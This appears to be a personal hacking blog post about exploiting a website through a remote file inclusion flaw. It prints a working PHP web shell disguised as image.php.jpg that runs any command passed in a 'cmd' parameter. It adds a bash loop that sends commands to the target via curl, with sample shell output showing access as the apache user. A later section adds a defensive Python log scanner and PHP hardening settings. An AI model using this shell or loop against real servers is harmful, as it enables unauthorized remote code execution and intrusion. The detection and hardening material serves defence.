I know there are several PHP shells out there, but I like to build everything myself; that's the scope and the fun part.
So yesterday, while exploiting a site with an RFI vulnerability, I reused my favourite "shell over HTTP" variant ;)
Here is the PHP code to upload:
$ cat Hacking/image.php.jpg
<?php
// Run the command given in the "cmd" query parameter.
// With "plain" set, return the raw output; otherwise wrap it for the browser
// (the wrapping HTML tags around the second echo were lost in extraction).
if (isset($_GET['cmd']) && $_GET['cmd'] != "") {
    if (isset($_GET['plain']) && $_GET['plain'] != "") {
        echo shell_exec($_GET['cmd']);
    } else {
        echo "" . shell_exec($_GET['cmd']) . "";
    }
}
?>
$
So from the browser we use it without the "plain" argument, simply adding the "cmd" argument, and from the terminal we add "plain=1":
$ while [ 1 ]; do
    echo -n "$ " && read CMD \
    && CMD2=$(echo "$CMD" | sed -e 's/ /+/g') \
    && curl "http://imavulnerablesite.com/vulnerable.php?parameters&plain=1&cmd=$CMD2+2%3E%261"
  done
$ id
uid=48(apache) gid=48(apache) groups=14(uucp),48(apache)
$ ls -la
total 136
drwxr-xr-x  7 root root 4096 Aug 30 14:49 .
drwxr-xr-x 13 root root 4096 May  9 14:55 ..
-rw-r--r--  1 root root   36 Apr  3 17:43 .htaccess
[...]
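Everything the loop above sends is visible to the target's web server log: the include parameter pointing at a remote URL, a PHP file hiding behind an image suffix (image.php.jpg), a "cmd" parameter, and the URL-encoded "2>&1" redirection. The following is an added example, not code from the post, that scans Apache-style access log lines for exactly those indicators. The log lines, IP addresses and parameter name "page" are constructed for the example; the parameter names in COMMAND_PARAMS are an assumed watch list, not a standard.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [30/Aug/2012:14:49:01 +0000] "GET /vulnerable.php?page=http://203.0.113.9/image.php.jpg&plain=1&cmd=id+2%3E%261 HTTP/1.1" 200 61 "-" "curl/7.22.0"
198.51.100.7 - - [30/Aug/2012:14:50:12 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [30/Aug/2012:14:51:30 +0000] "GET /vulnerable.php?page=http://203.0.113.9/image.php.jpg&cmd=ls+-la HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
192.0.2.3 - - [30/Aug/2012:14:52:02 +0000] "GET /gallery.php?img=photo.jpg HTTP/1.1" 200 32000 "-" "Mozilla/5.0"
"""

# Enough of the combined log format to pull out client IP, timestamp and request target.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Assumed watch list of parameter names commonly used to carry a command.
COMMAND_PARAMS = {"cmd", "c", "exec", "command"}
# Shell constructs that have no business inside an ordinary query parameter.
SHELL_MARKERS = ("2>&1", "|", "$(", "`")


def indicators(target):
    """Return the list of indicator tags found in one request target."""
    found = []
    query = urlparse(target).query
    # parse_qs percent-decodes values and turns '+' into a space, so
    # "id+2%3E%261" is seen here as "id 2>&1".
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            # 1. Include-style parameter whose value is a remote URL (RFI source).
            if re.match(r'^(https?|ftp)://', value, re.I):
                found.append(f"remote-url:{name}")
                # A .php.<image ext> name hides PHP behind an image suffix.
                if re.search(r'\.php\.\w+$', value, re.I):
                    found.append("double-extension")
            # 2. A parameter named like a command carrier.
            if name.lower() in COMMAND_PARAMS:
                found.append(f"command-param:{name}")
            # 3. A value containing shell redirection or command substitution.
            if any(marker in value for marker in SHELL_MARKERS):
                found.append(f"shell-redirect:{name}")
    return found


def scan_log(text):
    """Return (ip, target, indicators) for every log line that has at least one indicator."""
    hits = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        tags = indicators(match.group("target"))
        if tags:
            hits.append((match.group("ip"), match.group("target"), tags))
    return hits


if __name__ == "__main__":
    for ip, target, tags in scan_log(SAMPLE_LOG):
        print(f"{ip} {target}\n    {', '.join(tags)}")
```

Run against the constructed lines, the two requests from 203.0.113.5 are flagged (remote include of a .php.jpg file plus a command parameter, one of them with the encoded redirection) while the two ordinary page requests are not. On the server side, the path the post relies on is closed by `allow_url_include=Off` (and `allow_url_fopen=Off` where the application can live without it) so include() cannot fetch a remote file at all, and by listing `shell_exec` and its siblings in `disable_functions` so an included script cannot spawn a shell even if it does get loaded.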
Happy hacking ;)